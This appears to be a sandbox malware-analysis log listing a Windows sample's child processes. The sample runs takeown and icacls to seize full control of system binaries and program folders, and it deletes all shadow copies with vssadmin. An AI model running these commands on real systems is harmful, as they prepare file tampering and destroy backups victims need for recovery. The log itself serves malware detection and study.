C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.msi" /grant Administrators:F2⤵PID:3016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\PerfLogs" /a2⤵PID:1440
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\PerfLogs" /grant Administrators:F2⤵PID:1648
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\PerfLogs\Admin" /a2⤵PID:2188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\PerfLogs\Admin" /grant Administrators:F2⤵PID:2600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\sfc.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\sfc.exe" /grant Administrators:F2⤵PID:1396
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\winload.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\winload.exe" /grant Administrators:F2⤵PID:320
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip" /a2⤵PID:3064
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip" /grant Administrators:F2⤵PID:2064
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\ntoskrnl.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\ntoskrnl.exe" /grant Administrators:F2⤵PID:356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\7z.exe" /a2⤵PID:316
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\7z.exe" /grant Administrators:F2⤵PID:1676
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\Lang" /a2⤵PID:2092
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\Lang" /grant Administrators:F2⤵PID:2148
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files" /grant Administrators:F2⤵PID:896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared" /grant Administrators:F2⤵PID:2184
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Filters" /a2⤵PID:1108
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Filters" /grant Administrators:F2⤵PID:984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\hal.dll" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\hal.dll" /grant Administrators:F2⤵PID:1472
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink" /grant Administrators:F2⤵PID:1984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2676
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA" /grant Administrators:F2⤵PID:2912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\servicing\trustedinstaller.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG" /grant Administrators:F2⤵PID:1728
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\servicing\trustedinstaller.exe" /grant Administrators:F2⤵PID:2924
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ" /grant Administrators:F2⤵PID:2712
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK" /grant Administrators:F2⤵PID:2264
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE" /grant Administrators:F2⤵PID:2816
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR" /grant Administrators:F2⤵PID:2704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\en-US" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:780
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\cmd.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\cmd.exe" /grant Administrators:F2⤵PID:644
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US" /grant Administrators:F2⤵PID:1404
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES" /grant Administrators:F2⤵PID:2608
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\regedit.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE" /grant Administrators:F2⤵PID:484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\regedit.exe" /grant Administrators:F2⤵PID:1252
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI" /grant Administrators:F2⤵PID:1548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR" /grant Administrators:F2⤵PID:2416
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions" /grant Administrators:F2⤵PID:2120
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad" /grant Administrators:F2⤵PID:2148
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad" /grant Administrators:F2⤵PID:848
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\reg.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main" /grant Administrators:F2⤵PID:832
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\reg.exe" /grant Administrators:F2⤵PID:2848
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers" /grant Administrators:F2⤵PID:1572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu" /grant Administrators:F2⤵PID:1980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad" /grant Administrators:F2⤵PID:2456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred" /grant Administrators:F2⤵PID:1468
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskmgr.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols" /grant Administrators:F2⤵PID:2936
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskmgr.exe" /grant Administrators:F2⤵PID:2040
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web" /grant Administrators:F2⤵PID:2672
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL" /grant Administrators:F2⤵PID:692
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR" /grant Administrators:F2⤵PID:296
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU" /grant Administrators:F2⤵PID:2552
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization" /grant Administrators:F2⤵PID:2108
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\utilman.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\utilman.exe" /grant Administrators:F2⤵PID:580
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT" /grant Administrators:F2⤵PID:1004
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP" /grant Administrators:F2⤵PID:1612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR" /grant Administrators:F2⤵PID:2188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT" /grant Administrators:F2⤵PID:1464
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV" /grant Administrators:F2⤵PID:284
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO" /grant Administrators:F2⤵PID:928
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.exe" /grant Administrators:F2⤵PID:2372
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL" /a2⤵PID:1568
-
-
C:\windows\system32\vssadmin.exe
"C:\windows\system32\vssadmin.exe" delete shadows /all /quiet
- Interacts with shadow copies
PID:1664
- Possible privilege escalation attempt
PID:1520
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Travel" /grant Administrators:F2⤵PID:1076
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall" /a2⤵PID:3032
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall" /grant Administrators:F2⤵PID:2844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette" /a2⤵PID:2364
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette" /grant Administrators:F2⤵PID:2968
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google" /a2⤵PID:1532
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google" /grant Administrators:F2⤵PID:2484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome" /a2⤵PID:2144
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome" /grant Administrators:F2⤵PID:1424
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\chrome.exe" /a2⤵PID:2328
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\chrome.exe" /grant Administrators:F2⤵PID:2744
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119" /a2⤵PID:2752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119" /grant Administrators:F2⤵PID:2444
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe" /a2⤵PID:2132
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe" /grant Administrators:F2⤵PID:204
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps" /a2⤵PID:2240
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:1488
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions" /a2⤵PID:200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions" /grant Administrators:F2⤵PID:2176
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer" /a2⤵PID:1524
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer" /grant Administrators:F2⤵PID:1852
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" /a2⤵PID:2356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" /grant Administrators:F2⤵PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales" /a2⤵PID:1824
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales" /grant Administrators:F2⤵PID:2736
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload" /a2⤵PID:2956
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload" /grant Administrators:F2⤵PID:2148
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements" /a2⤵PID:804
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements" /grant Administrators:F2⤵PID:2796
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm" /a2⤵
- Possible privilege escalation attempt
PID:2060
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm" /grant Administrators:F2⤵PID:2292
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific" /a2⤵PID:344
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific" /grant Administrators:F2⤵PID:2972
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64" /a2⤵PID:2228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64" /grant Administrators:F2⤵PID:1984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\SetupMetrics" /a2⤵PID:1900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\SetupMetrics" /grant Administrators:F2⤵PID:1588
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer" /a2⤵PID:2576
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer" /grant Administrators:F2⤵PID:2156
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\iediagcmd.exe" /a2⤵
- Possible privilege escalation attempt
PID:1532
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\iediagcmd.exe" /grant Administrators:F2⤵PID:2028
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\de-DE" /a2⤵PID:2096
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\de-DE" /grant Administrators:F2⤵PID:760
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\en-US" /a2⤵PID:1216
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\en-US" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\es-ES" /a2⤵PID:2428
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\es-ES" /grant Administrators:F2⤵PID:2548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\fr-FR" /a2⤵PID:1704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\fr-FR" /grant Administrators:F2⤵PID:2468
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\images" /a2⤵PID:2672
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\images" /grant Administrators:F2⤵PID:1896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\it-IT" /a2⤵PID:212
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\it-IT" /grant Administrators:F2⤵PID:1612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\ja-JP" /a2⤵PID:296
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\ja-JP" /grant Administrators:F2⤵PID:2360
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\SIGNUP" /a2⤵PID:1408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\SIGNUP" /grant Administrators:F2⤵PID:1260
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java" /a2⤵PID:2480
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java" /grant Administrators:F2⤵PID:2600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80" /a2⤵PID:2108
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80" /grant Administrators:F2⤵PID:644
-
-
